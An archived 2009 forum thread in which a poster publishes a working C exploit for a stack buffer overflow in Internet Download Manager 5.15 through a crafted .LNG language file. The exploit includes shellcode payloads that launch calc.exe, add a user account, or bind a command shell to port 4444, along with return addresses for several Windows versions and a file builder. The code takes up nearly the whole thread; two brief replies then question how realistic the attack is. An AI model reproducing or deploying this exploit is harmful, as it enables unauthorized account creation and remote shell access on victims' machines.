Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 12:15

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 3 posts ] 
Author Message
 Post subject: Internet Download Manager 5.15
PostPosted: 01 Mar 2009 21:30 

Joined: 03 Feb 2009 01:40
Posts: 31
MMmm here is good one for IDM.
Demo video
http://rapidshare.com/files/204135482/idm.avi.html
Code:
/*
-----------------------------------
Internet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit

cORRuption start at the address in stack of 0x0012E0B4
SEH CHANINS

SEH_1
address_1  0012EE8C -STATUS: clean

SEH_2

address_2  0012FF04 -STATUS: clean

SEH_3

address_3  0012FFB0 -STATUS: clean

EAX 0000002A
ECX 90909090  --controled
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 0012EEAC
ESP 0012E584 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 90909090  --controled
ESI 0012FA6C
EDI 0012E784 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EIP 45595945  --controled

CALL STACK --1

call stack  Call stack of main thread, item 3
Address=0012EE24 -> Possible return address
Procedure / arguments=  pMsg = IDMan.005C70D0


CALL STACK --2

Call stack of main thread, item 8
Address=0012EE60 -> Possible return address
Procedure / arguments=IDMan.00540FAD
Called from=IDMan.0053E281
Stack Dump=00000004 005C71E0 005C7178

Credits for finding the bug go to musashi , credits for programming exploit go to fl0 fl0w.
Tested of Microsoft Windows XP sp3,compiled with Borland C++ 3.1.
-------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>



                   /*tnx Metasploit for Shellcodes*/
//LAUNCH CALC.EXE   
             char shellcode_1[] =
                  "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";

//ADD USER
                                                char shellcode_2[ ]=
                                                                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                            "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

//REVERSE CMD SHELL ->BIND PORT
               char shellcode_3[] =
                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                    "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
                   
#define SIZE 10000
#define OFFSET 1186

        struct {
    char *OS;
    unsigned int EIP;
    }
Retcodes [] = { { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },/*call esp */
          { "Microsoft Windows Pro sp3 English:", 0x7C86467B },   /*jmp esp */
          { "\t\t\t  UNIVERSAL_1:", 0x1008E153 },
          { "\t\t\t  UNIVERSAL_2:", 0x219FB9B },
          { "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /*jmp esp*/
          { "sss", 0x7C868667} ,
        }, t;

char hh[] = {
    0x6C, 0x61, 0x6E, 0x67, 0x3D, 0x30, 0x78, 0x31, 0x66, 0x20, 0x54, 0xC3, 0xBC, 0x72, 0x6B, 0xC3,
    0xA7, 0x65, 0x0D, 0x0A, 0x32, 0x30, 0x33, 0x37, 0x36, 0x3D, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
};



class EXPLOIT {
   public:
          void file (char *filename , char *buff);
void write (char *buffer, int shellc_type,char *Y);
void print ();
void usage (char *name);
void target ();
};

int main(int argc, char *argv[])
   {
      EXPLOIT IDM;
      int X, shell ;
      char *Z;
      char *actbuff;
     actbuff = (char *)malloc(SIZE);
     if (argc < 3) {
             system("cls");
             printf("***********************************************************************\n");
             IDM.print ();
             IDM.usage (argv[0]);
             //Sleep(1000);
             printf("\n\n");
             printf("\t\t\t\tTargets\n");
             IDM.target();
             printf("************************************************************************\n");
                 exit (0);
        }


   Z = argv[1];
   shell = atoi(argv[2]);
   IDM.write (actbuff, shell, Z);
   IDM.file (argv[3], actbuff);
   IDM.print();
   printf("Loading ...");
   //Sleep(3000);
        printf ("File build succesfully\n");

   return 0;
}
  void EXPLOIT::target()
  {
   int i;
for (i = 0; i < sizeof(Retcodes)/sizeof(t); i++)
     printf("> %d %s <0x%.8x> \n", i, Retcodes[i].OS, Retcodes[i].EIP);
       }
void EXPLOIT::file (char *filename, char *buff)
{
    FILE *f;

   if ((f = fopen(filename, "wb")) == NULL) {
     printf("Error writing file\n");
         exit(0);
    }
   fwrite (buff, 1 , strlen(buff), f);
   free (buff);
   fclose (f);
      }

void EXPLOIT::write (char *buffer, int shellc_type, char *Y)
{
    unsigned int offset = 0;

   unsigned int RET = Retcodes[atoi(Y)].EIP;
    memset (buffer ,0x90, SIZE);
    memcpy (buffer, hh, strlen (hh));
    offset = OFFSET;
    memcpy (buffer + offset, &RET, 4); offset += 4;
    memset (buffer + offset , 0x90, 10); offset +=10;
   switch (shellc_type) {
         case 1:
             memcpy (buffer + offset ,shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1);
             memset (buffer + offset, 0x00, 1);
               break;
             case 2:
               memcpy (buffer + offset ,shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2);
               memset (buffer + offset, 0x00, 1);
                      break;
               case 3:
                  memcpy (buffer + offset ,shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3);
                  memset (buffer + offset, 0x00, 1);
                         break;
        }

      }
    void EXPLOIT::usage(char *K)
    {
     printf ("Usage is: %s [target] [shell_type] [filename].html\n", K);
     fputs (
       "\t\tRetaddress for your version of Windows\n"
       "\t\tShell_type is the type of shellcode you want to run\n"
       "\t\t\t *Press 1 To Run CALC.EXE\n"
       "\t\t\t *Press 2 To Add User\n"
       "\t\t\t *Press 3 To Bind Shell to Port 4444\n"
       "\t\tExample\n"
       "\t\t\tIDM.exe 0 3 file.txt\n"
    ,stdout);
    }
  void EXPLOIT::print()
  {
    fputs(
     "\t\tInternet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit\n"
     "\t\tby fl0 fl0w\n"
     "\t\tContact: flo_flow_supremacy@yahoo.com\n"
     "\n", stdout);
       }





Btw all the vs have this bug.
Internet Download Manager 5.11 (2.3 MB)
Internet Download Manager 5.09 (2.3 MB)
Internet Download Manager 5.08 (2.2 MB)
Internet Download Manager 5.07 (2.2 MB)
Internet Download Manager 5.05 (2.0 MB)
Internet Download Manager 5.04 (2.0 MB)
Internet Download Manager 5.03 (1.9 MB)
Internet Download Manager 5.02 (1.9 MB)
Internet Download Manager 5.01


Top
 Profile  
 
 
 Post subject: Re: Internet Download Manager 5.15
PostPosted: 02 Mar 2009 01:26 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
isn't LNG a type of file usually used for the alternative languages?
if this is the case the attack scenario is not much realistic moreover because the language files are officials on the IDM website


Top
 Profile  
 
 Post subject: Re: Internet Download Manager 5.15
PostPosted: 02 Mar 2009 15:19 

Joined: 03 Feb 2009 01:40
Posts: 31
Mmmm I think your right , even if you make a html page that would launch IDM upon dw , the user would still have to have the LNG file in his local directory.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 3 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: